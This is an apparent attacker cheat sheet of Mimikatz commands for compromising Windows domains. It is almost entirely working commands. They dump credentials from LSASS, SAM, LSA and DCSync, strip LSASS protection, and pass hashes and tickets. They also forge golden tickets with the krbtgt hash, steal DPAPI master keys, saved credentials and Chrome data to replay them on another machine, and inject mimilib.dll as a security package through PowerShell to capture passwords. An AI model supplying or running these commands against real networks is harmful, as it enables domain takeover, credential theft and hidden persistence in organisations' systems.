privilege::debug
token::elevate
lsadump::secrets
lsadump::sam
lsadump::lsa
sekurlsa::logonpasswords
sekurlsa::ekeys

sekurlsa::pth /user:<ADMIN Username> /domain:<Fully Qualified Domain Name> /ntlm:<Administrator NTLM Hash>

----------------------------------------------------------------------------------------------------------------------------------------

mimidrv.sys:
!+
!processprotect /process:lsass.exe /remove

mimilib.dll:
misc::memssp

----------------------------------------------------------------------------------------------------------------------------------------

lsadump::dcsync /domain:<Fully Qualified Domain Name> /user:<ADMIN Username>

sekurlsa::tickets /export
kerberos::ptt ruserious.kirbi
misc::cmd

****************************************************************************************************************************************

whoami /user

net localgroup administrators /domain

In DC Machine:
sekurlsa::krbtgt
(or)
Dump krbtgt NTLM hash from memory
LM:NTLM

kerberos::golden /user:<DOMAIN ADMIN NAME from "net localgroup administrators /domain"> /domain:<DOMAIN NAME from "whoami /user"> /sid:<SID from "whoami /user"> /sids:<Additional SID for Forest> /krbtgt:<NTLM HASH from "sekurlsa::krbtgt"> /startoffset:0 /endin:600 /renewmax:10080 /ptt

kerberos::tgt
misc::cmd

****************************************************************************************************************************************

lsadump::lsa /inject /name:krbtgt

kerberos::golden /domain:ADIOS /sid:<SID> /sids:<Additional SID for Forest> /rc4:<RC4 i.e NTLM hash> /user:l33t /id:0xffffffff /groups:512,513,518,519,520 /ticket:ruserious.kirbi

kerberos::golden /domain:ADIOS /sid:<SID> /sids:<Additional SID for Forest> /aes256:<AES256 string> /user:l33t /id:0xffffffff /groups:512,513,518,519,520 /ticket:ruserious.kirbi

kerberos::ptt ruserious.kirbi

kerberos::tgt
misc::cmd

****************************************************************************************************************************************

kerberos::golden /domain:<FULLY QUALIFIED DOMAIN NAME> /SID:<DOMAIN SID VALUE> /rc4:<DOMAIN ADMIN NTLM HASH> /user:<DOMAINUSER TO ASSIGN THE TICKET> /id:500 /ptt
misc::cmd

dir \\<DC HOST NAME>\c$

----------------------------------------------------------------------------------------------------------------------------------------

sekurlsa::pth /user:<USERNAME wihtout DOMAIN> /domain:<FULLY QUALIFIED DOMAIN NAME> /ntlm:<NTLM Hash> /run:"mstsc.exe /restrictedadmin"

sekurlsa::pth /user:<USERNAME wihtout DOMAIN> /domain:<FULLY QUALIFIED DOMAIN NAME> /ntlm:<NTLM Hash> /run:powershell.exe
Enter-PSSession -Comp <FULLY QUALIFIED SYSTEM NAME>
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
sekurlsa::pth /user:<USERNAME wihtout DOMAIN> /domain:<FULLY QUALIFIED DOMAIN NAME> /ntlm:<NTLM Hash> /run:"mstsc.exe /restrictedadmin"

----------------------------------------------------------------------------------------------------------------------------------------

mimikatz.exe "sekurlsa::minidump microsoft.pdf" sekurlsa::logonPasswords exit

----------------------------------------------------------------------------------------------------------------------------------------

Machine A:

For same logged-in user:
dpapi::masterkey /in:"C:\Users\user01\AppData\Roaming\Microsoft\Protect\S-1-5-21-SOME-RANDOM-NUMBERS-1165\9c08e1e4-8719-4479-b104-875d3a02e6e7" /rpc
(or)
From Admin for different user in the same machine:
dpapi::masterkey /in:"C:\Users\user01\AppData\Roaming\Microsoft\Protect\S-1-5-21-SOME-RANDOM-NUMBERS-1165\9c08e1e4-8719-4479-b104-875d3a02e6e7" /rpc
dpapi::cache /load
lsadump::backupkeys /system:<DOMAIN CONTROLLER or DOMAIN FQDN> /export
dpapi::cache /load
dpapi::masterkey /in:"C:\Users\user01\AppData\Roaming\Microsoft\Protect\S-1-5-21-SOME-RANDOM-NUMBERS-1165\9c08e1e4-8719-4479-b104-875d3a02e6e7" /rpc

Copy the cred file from C:\Users\user01\AppData\Local\Microsoft\Credentials\<1 KB FILE not the file more than 10 KB>

Copy files for Chrome:
C:\Users\user01\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\user01\AppData\Local\Google\Chrome\User Data\Default\<ALL FILES except FOLDERS>

Machine B:

dpapi::create /guid:{9c08e1e4-8719-4479-b104-875d3a02e6e7} /key:<KEY FROM dpapi::masterkey> /password:<NEW PASSWORD> /protected

Place the newly generated file to %appdata%\Microsoft\Protect\<SID FOLDER>\

Also, place the copied cred file to %localappdata%\Microsoft\Credentials\

Also, place the chrome files in respective locations:
%localappdata%\Google\Chrome\User Data\Local State
%localappdata%\Google\Chrome\User Data\Default\<ALL FILES except FOLDERS>

----------------------------------------------------------------------------------------------------------------------------------------

$DllName= (Get-Item -Path ".\").FullName + "\mimilib.dll";$DynAssembly = New-Object System.Reflection.AssemblyName('SSPI2');$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly,[Reflection.Emit.AssemblyBuilderAccess]::Run);$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI2',$False);$TypeBuilder = $ModuleBuilder.DefineType('SSPI2.Secur32','Public, Class');$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('AddSecurityPackage','secur32.dll','Public,Static',[Reflection.CallingConventions]::Standard,[Int32],[Type[]] @([String], [IntPtr]),[Runtime.InteropServices.CallingConvention]::Winapi,[Runtime.InteropServices.CharSet]::Auto);$Secur32 = $TypeBuilder.CreateType();if([IntPtr]::Size -eq 4){$StructSize = 20}else{$StructSize = 24};$StructPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal($StructSize);[Runtime.InteropServices.Marshal]::WriteInt32($StructPtr,$StructSize);$RuntimeSuccess = $True;$Result = $Secur32::AddSecurityPackage($DllName,$StructPtr);

----------------------------------------------------------------------------------------------------------------------------------------
